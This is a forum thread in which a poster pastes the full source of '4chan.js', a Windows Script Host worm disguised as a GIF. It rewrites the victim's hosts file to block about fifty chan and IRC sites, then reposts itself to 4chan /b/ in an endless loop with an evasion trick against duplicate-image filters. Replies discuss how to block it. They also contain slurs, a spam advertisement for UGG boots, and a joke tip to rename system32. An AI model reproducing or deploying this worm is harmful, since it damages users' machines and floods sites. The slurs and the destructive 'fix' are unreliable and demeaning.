the contents of 4chan.js

hey /prog/rammers

I saved the 4chan.js but not as .js but as .txt

I am able to extract the contents of the javascript code, which I will post right now.

however, since I cannot read javascript because javascript != java, I leave it to your discretion as to how to counter 4chan.js

also, moot if you're reading this, this is oh exploitable on your part. use this code to find the solution to this madness.

code:

GIF89a=    "    p    1,>>>><<<<牋㍻   >>                                                                                                                                                                                                                                                                                                                                                                 ";
var targets = ["ns1.4chan.org", "ns2.4chan.org", "ns3.4chan.org", "www.4chan.org", "content.4chan.org", "orz.4chan.org", "tmp.4chan.org", "rs.4chan.org", "static.4chan.org", "zip.4chan.org", "bin.4chan.org", "dis.4chan.org", "img.4chan.org", "dat.4chan.org", "cgi.4chan.org", "nov.4chan.org", "4chan.org", "status.4chan.org", "4chanstatus.blogspot.com", "irc.rizon.net", "7chan.org", "www.7chan.org", "img.7chan.org", "dix.7chan.org", "irc.7chan.org", "420chan.org", "img.420chan.org", "disc.420chan.org", "irc.420chan.org", "blog.420chan.org", "radio.420chan.org", "711chan.org", "www.711chan.org", "irc.711chan.org", "99chan.org", "www.99chan.org", "irc.99chan.org", "12chan.org", "www.12chan.org", "img.12chan.org", "irc.12chan.org", "shii.org", "www.shii.org", "irc.partyvan.us", "irc.partyvan.fm", "irc.raidchan.org", "encyclopediadramatica.com", "www.encyclopediadramatica.com", "partyvan.eu", "www.partyvan.eu", "anontalk.com", "www.anontalk.com"];

// Character choices for random alphanumeric strings
var choices = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

// Last update time for front page
var modtime = null;

// Get copy of this script
var fs = WSH.createObject("Scripting.FileSystemObject");
var thisfile = fs.openTextFile(WSH.scriptFullName, 1);
var image = thisfile.readAll().replace(/\x01\x01\x01\x01.*?~/, "\x01\x01\x01\x01\u0b87~");
thisfile.close();

// Put copies of the script in System32 directory
try {
    var shell = WScript.CreateObject("WScript.Shell");
    var env = shell.environment("PROCESS");
    var winpath = env("SYSTEMROOT");
    var hostsfile = fs.openTextFile(winpath + "\\system32\\drivers\\etc\\hosts", 8);
    for (var i = 0; i < targets.length; i++) {
        hostsfile.writeLine("127.0.0.1       " + targets[i]);
    }
    hostsfile.close();
    shell.Run("ipconfig /flushdns");
} catch(e) {}

// Post it over and over
var comment = "1. Open this image.\r\n2. Save it as lol.js\r\n3. Open the file you just saved.\r\n4. ???\r\n5. Shit bricks.";
var filename = "lol.gif";
while (1) {
    try {
        // Modify "image" to get around duplicate image filter
        image = image.substr(0,image.length-20);
        for (var i = 0; i < 20; i++) {
            image = image + choices.charAt( Math.floor(Math.random()*choices.length) );
        }

        // Create XMLHttp request object
        var request = WSH.createObject("Msxml2.XMLHTTP");

        // Get a thread number
        request.open("get", "http://207.126.64.181/b/imgboard.html", 0);
        if (modtime != null) {
            request.setRequestHeader("If-Modified-Since", modtime);
        }
        request.send();
        modtime = request.getResponseHeader("Last-Modified");
        var threadlist = request.responseText.match(/<span id="nothread\d+/g);
        var thread = threadlist[ Math.floor(Math.random()*threadlist.length) ].match(/\d+/)[0];

        // Set site to post to
        request.open("post", "http://207.126.64.182/b/imgboard.php", 0);

        // Set headers
        var bdry = "";
        for (var i = 0; i < 20; i++) {
            bdry = bdry + choices.charAt( Math.floor(Math.random()*choices.length) );
        }
        request.setRequestHeader( "Referer", "http://img.4chan.org/b/res/" + thread + ".html" );
        request.setRequestHeader( "Content-Type", "multipart/form-data; boundary=" + bdry );

        // Generate random password
        var pwd = "";
        for (var i = 0; i < 8; i++) {
            pwd = pwd + choices.charAt( Math.floor(Math.random()*choices.length) );
        }

        // Send post
        var post = "--%b%cMAX_FILE_SIZE\"\r\n\r\n2097152\r\n"
            + "--%b%cresto\"\r\n\r\n" + thread + "\r\n"
            + "--%b%cname\"\r\n\r\n\r\n"
            + "--%b%cemail\"\r\n\r\nnoko\r\n"
            + "--%b%csub\"\r\n\r\n\r\n"
            + "--%b%ccom\"\r\n\r\n" + comment + "\r\n"
            + "--%b%cupfile\"; filename=\"" + filename + "\"\r\nContent-Type: image/gif\r\n\r\n";
        var post2 = "\r\n"
            + "--%b%cpwd\"\r\n\r\n" + pwd + "\r\n"
            + "--%b%cmode\"\r\n\r\nregist\r\n"
            + "--%b--\r\n";
        post = post.replace(/%b/g, bdry);
        post = post.replace(/%c/g, "\r\nContent-Disposition: form-data; name=\"");
        post2 = post2.replace(/%b/g, bdry);
        post2 = post2.replace(/%c/g, "\r\nContent-Disposition: form-data; name=\"");
        request.send(post + image + post2);
        WSH.sleep( 45000 + Math.floor(30000 * Math.random()) );
    } catch(e) {}
}

// embrQroKRMcFSZftMv7H

DON'T HELP HIM!!!!

But seriously, it's not something that's difficult to block. Just swap one of the IP address (ie, img for nov), examine the data of uploaded GIFs for the source, or put an autoban filter on that comment string.

What can we do? Nothing, except *snicker* EDUCATE people. Like that will happen any time soon.

Nice, shame it's not more violent though.

when this was originally going around MrVacBob blocked it (and i quote) "several different ways."  they are quite aware of how it works and are trying to keep a step ahead of those propagating the js (unfortunately).

Who exactly cares about /b/ and the retards falling for this?

Saving files as .txt is l33t h4x now?
Windows users are shit, faggots and scum.

>>7
Truth

>>7
Don't talk about ANONIX that way.

Since 4chan already has it's autoban filters, you'd think they would've put "1. Open this image.\r\n2. Save it as lol.js\r\n3. Open the file you just saved.\r\n4. ???\r\n5. Shit bricks." as autoban sooner.
I am not quite nearly an EXPERT JAVASCRIPT PROGRAMMER, but what the fuck does Internet Explorer allow cross-site scripting?

>>10
Every browser allows cross-site scripting. It has legitimate uses too.

apparently IE/windows throws up warnings as well when you try and run the script but /b/ clicks through anyway.  at that point it's really not worth saving the individual.

One would hope that they become slightly more educated about the dangers of running JS files when "127.0.0.1 4chan.org" is added to their hosts file (except if they're on vista, in which case it would fail to do that part).

Are you planning to buy a pair of <a href="http://www.fashionuggboots.co.uk/ugg-bailey-button-5803">UGG boots bailey button</a>? As you know that <a href="http://www.fashionuggboots.co.uk/ugg-bailey-button-5803">bailey button ugg boots on sale</a> are renowned for their quality and comfort, but these <a href="http://www.fashionuggboots.co.uk/ugg-adirondack-boot-II"> UGG boots on sale uk</a> is a blend of style, glamor, quality and comfort forever. Without thinking much you can use these <a href="http://www.shopinguggboot.com/UGG-Classic-Tall-5815">UGG boots classic tall</a> in the freezing, as they protect your feet dry and warm. <a href="http://www.fashionuggboots.co.uk/ugg-classic-tall-5815">classic tall ugg boots on sale</a> will make your feet feel comfortable and do not get cold.
Excellent news for you now, We"ve got fantastic shoe clearance<a href="http://www.fashionuggboots.co.uk/ugg-classic-cardy-5819"> classic cardy ugg boots on sale</a> , especially uggs clearance sale shoes, shop the shoe clearance sales before they’re over! One of ugg hot selling styles, the <a href="http://www.shopinguggboot.com/ugg-boots-classic-cardy-5819">UGG boots classic cardy</a> small sale a calf height boot features genuine twin-face sheepskin and our signature woven mark. All boots in our Classic Collection feature a soft foam insole covered with genuine sheepskin and have a molded EVA light and flexible outsole designed for incredible comfort with every step. The ugg sale is a key item in any woman’s wardrobe. It can be worn with jeans, skirts, and leggings, to name but a few! Slip into the Classic Small boot and feel UGG Australia luxury. The ugg bailey button boots on sale will keep your feet cosy and warm in cold temperatures and at a comfortable level when the sun is bright – That is why <a href="http://www.shopinguggboot.com/ugg-boots-classic-cardy-5819"> UGG boots classic cardy</a> can be worn in warmer weather and your feet wont get all hot and sweaty! Now you can wear your new season Ugg Cardy in every season.

>>15
GOD DAMNIT!

>>1
Did you ever think that moot has done nothing because he doesn't give a flying fuck?

>>17
Welcome to 2008. Please use sage.

WELCOME TO THE FUTURE BITCHES. FUCKING SAGE.

var hostsfile = fs.openTextFile(winpath + "\\system32\\drivers\\etc\\hosts", 8);

Easy, jusy rename system32 and you'll be safe from this...